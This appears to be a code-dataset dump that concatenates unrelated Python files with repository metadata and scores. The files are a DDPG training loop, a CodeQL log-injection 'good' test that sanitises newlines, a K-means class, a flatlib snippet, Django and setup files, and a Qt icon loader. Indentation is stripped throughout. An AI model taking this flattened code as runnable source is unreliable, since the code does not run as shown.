default="BipedalWalker-v3",
help='The OpenAI Gym environment to train on, '
'e.g. BipedalWalker-v3, LunarLanderContinuous-v2,'
' Pendulum-v0')
parser.add_argument('--render_env', type=bool, nargs='?', default=True,
help='Render the environment to be visually visible')
parser.add_argument('--train', type=bool, nargs='?', default=True,
help='Train the network on the modified DDPG algorithm')
parser.add_argument('--use_noise', type=bool, nargs='?', default=True,
help='OU Noise will be applied to the policy action')
parser.add_argument('--eps_greedy', type=float, nargs='?', default=0.95,
help="The epsilon for Epsilon-greedy in the policy's action")
parser.add_argument('--warm_up', type=bool, nargs='?', default=1,
help='Following recommendation from OpenAI Spinning Up, the actions in the '
'early epochs can be set random to increase exploration. This warm up '
'defines how many epochs are initially set to do this.')
parser.add_argument('--save_weights', type=bool, nargs='?', default=True,
help='Save the weight of the network in the defined checkpoint file '
'directory.')
args = parser.parse_args()
RL_TASK = args.env
RENDER_ENV = args.render_env
LEARN = args.train
USE_NOISE = args.use_noise
WARM_UP = args.warm_up
SAVE_WEIGHTS = args.save_weights
EPS_GREEDY = args.eps_greedy
# Step 1. create the gym environment
env = gym.make(RL_TASK)
action_space_high = env.action_space.high[0]
action_space_low = env.action_space.low[0]
brain = Brain(env.observation_space.shape[0], env.action_space.shape[0], action_space_high,
action_space_low)
tensorboard = Tensorboard(log_dir=TF_LOG_DIR)
# load weights if available
logging.info("Loading weights from %s*, make sure the folder exists", CHECKPOINTS_PATH)
brain.load_weights(CHECKPOINTS_PATH)
# all the metrics
acc_reward = tf.keras.metrics.Sum('reward', dtype=tf.float32)
actions_squared = tf.keras.metrics.Mean('actions', dtype=tf.float32)
Q_loss = tf.keras.metrics.Mean('Q_loss', dtype=tf.float32)
A_loss = tf.keras.metrics.Mean('A_loss', dtype=tf.float32)
# To store reward history of each episode
ep_reward_list = []
# To store average reward history of last few episodes
avg_reward_list = []
# run iteration
with trange(TOTAL_EPISODES) as t:
for ep in t:
prev_state = env.reset()
acc_reward.reset_states()
actions_squared.reset_states()
Q_loss.reset_states()
A_loss.reset_states()
brain.noise.reset()
for _ in range(2000):
if RENDER_ENV: # render the environment into GUI
env.render()
# Recieve state and reward from environment.
cur_act = brain.act(tf.expand_dims(prev_state, 0), _notrandom=(ep >= WARM_UP) and
(random.random() < EPS_GREEDY+(1-EPS_GREEDY)*ep/TOTAL_EPISODES),
noise=USE_NOISE)
state, reward, done, _ = env.step(cur_act)
brain.remember(prev_state, reward, state, int(done))
# update weights
if LEARN:
c, a = brain.learn(brain.buffer.get_batch(unbalance_p=UNBALANCE_P))
Q_loss(c)
A_loss(a)
# post update for next step
acc_reward(reward)
actions_squared(np.square(cur_act/action_space_high))
prev_state = state
if done:
break
ep_reward_list.append(acc_reward.result().numpy())
# Mean of last 40 episodes
avg_reward = np.mean(ep_reward_list[-40:])
avg_reward_list.append(avg_reward)
# print the average reward
t.set_postfix(r=avg_reward)
tensorboard(ep, acc_reward, actions_squared, Q_loss, A_loss)
# save weights
if ep % 5 == 0 and SAVE_WEIGHTS:
brain.save_weights(CHECKPOINTS_PATH)
env.close()
brain.save_weights(CHECKPOINTS_PATH)
logging.info("Training done...")
# Plotting graph
# Episodes versus Avg. Rewards
plt.plot(avg_reward_list)
plt.xlabel("Episode")
plt.ylabel("Avg. Epsiodic Reward")
plt.show()
| 2.46875 | 2 |
python/ql/test/experimental/query-tests/Security/CWE-117/LogInjectionGood.py | madhurimamandal/codeql | 4,036 | 12786544 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
@Desc :Log Injection
"""
from flask import Flask
from flask import request
import logging
logging.basicConfig(level=logging.DEBUG)
app = Flask(__name__)
@app.route('/good1')
def good1():
name = request.args.get('name')
name = name.replace('\r\n','').replace('\n','')
logging.info('User name: ' + name) # Good
return 'good1'
if __name__ == '__main__':
app.debug = True
handler = logging.FileHandler('log')
app.logger.addHandler(handler)
app.run()
| 2.65625 | 3 |
HW10_K-means/misc.py | 824zzy/CSE-6363_MACHINE-LEARNING | 0 | 12786545 | <filename>HW10_K-means/misc.py<gh_stars>0
import matplotlib.pyplot as plt
import numpy as np
from scipy.spatial.distance import cdist
class KMeans(object):
def __init__(self, n_clusters):
self.n_clusters = n_clusters
def fit(self, X, iter_max=100):
all_centers = []
I = np.eye(self.n_clusters)
centers = X[np.random.choice(len(X), self.n_clusters, replace=False)]
for _ in range(iter_max):
prev_centers = np.copy(centers)
D = cdist(X, centers)
cluster_index = np.argmin(D, axis=1)
cluster_index = I[cluster_index]
centers = np.sum(X[:, None, :] * cluster_index[:, :, None], axis=0) / np.sum(cluster_index, axis=0)[:, None]
all_centers.append(centers)
if np.allclose(prev_centers, centers):
break
self.centers = centers
return all_centers
def predict(self, X):
D = cdist(X, self.centers)
return np.argmin(D, axis=1) | 2.75 | 3 |
24_astro/astro.py | Tjorriemorrie/trading | 2 | 12786546 | import flatlib
from flatlib.chart import Chart
from flatlib.datetime import Datetime
from flatlib.geopos import GeoPos
def generate_data():
date = Datetime('2015/01/13', '17:00', '+10:00')
print(date)
pos = GeoPos('38n32', '8w54')
print(pos)
chart = Chart(date, pos)
print(chart)
if __name__ == '__main__':
generate_data()
| 2.9375 | 3 |
x_rebirth_station_calculator/station_data/wares/v_launcher.py | Phipsz/XRebirthStationCalculator | 1 | 12786547 | <filename>x_rebirth_station_calculator/station_data/wares/v_launcher.py<gh_stars>1-10
from x_rebirth_station_calculator.station_data.station_base import Ware
names = {'L044': 'V Launcher',
'L049': 'V-Starter'}
VLauncher = Ware(names)
| 1.375 | 1 |
modeltranslation_wrapper/models.py | zlorf/django-modeltranslation-wrapper | 1 | 12786548 | <reponame>zlorf/django-modeltranslation-wrapper
from django.conf import settings
try:
from modeltranslation import autodiscover
# direct patch will not be possible.
# one need to set 'modeltranslation_wrapper.patch' at end of MODELTRANSLATION_TRANSLATION_FILES
except ImportError:
# modeltranslation < 0.4, so use the translation autodiscover
settings.MODELTRANSLATION_TRANSLATION_FILES = list(
getattr(settings, 'MODELTRANSLATION_TRANSLATION_FILES', ()))
if getattr(settings, 'MODELTRANSLATION_TRANSLATION_REGISTRY', None):
settings.MODELTRANSLATION_TRANSLATION_FILES.append(settings.MODELTRANSLATION_TRANSLATION_REGISTRY)
if 'modeltranslation_wrapper.patch' in settings.MODELTRANSLATION_TRANSLATION_FILES:
settings.MODELTRANSLATION_TRANSLATION_FILES.remove('modeltranslation_wrapper.patch')
settings.MODELTRANSLATION_TRANSLATION_FILES.append('modeltranslation_wrapper.patch')
settings.MODELTRANSLATION_TRANSLATION_REGISTRY = 'modeltranslation_wrapper.translation_autodiscover'
| 1.492188 | 1 |
setup.py | degibbons/Tilibot | 0 | 12786549 | #!/usr/bin/env python
from distutils.core import setup
setup(name='Tilibot',
version='1.0', # Fix
description='Tiliqua Biomechanics Emulation',
author='<NAME>',
author_email='<EMAIL>',
packages=['distutils', 'distutils.command'], # Fix
) | 1.007813 | 1 |
Lib/site-packages/fidget/backend/Resources.py | fochoao/cpython | 1 | 12786550 | from fidget.backend.QtGui import QIcon
# noinspection PyUnresolvedReferences
import fidget.backend._resources
class LazyIcon:
def __init__(self, path):
self.path = path
self._instance = None
def __call__(self, *args, **kwargs):
if not self._instance:
self._instance = QIcon(self.path)
return self._instance
add_col_left_icon = LazyIcon(':fidget/feather/corner-left-down.svg')
add_col_right_icon = LazyIcon(':fidget/feather/corner-right-down.svg')
add_row_above_icon = LazyIcon(':fidget/feather/corner-up-right.svg')
add_row_below_icon = LazyIcon(':fidget/feather/corner-down-right.svg')
del_col_icon = LazyIcon(':fidget/feather/delete.svg')
del_row_icon = del_col_icon
error_icon = LazyIcon(':fidget/feather/alert-triangle.svg')
ok_icon = LazyIcon(':fidget/feather/check.svg')
| 2.109375 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.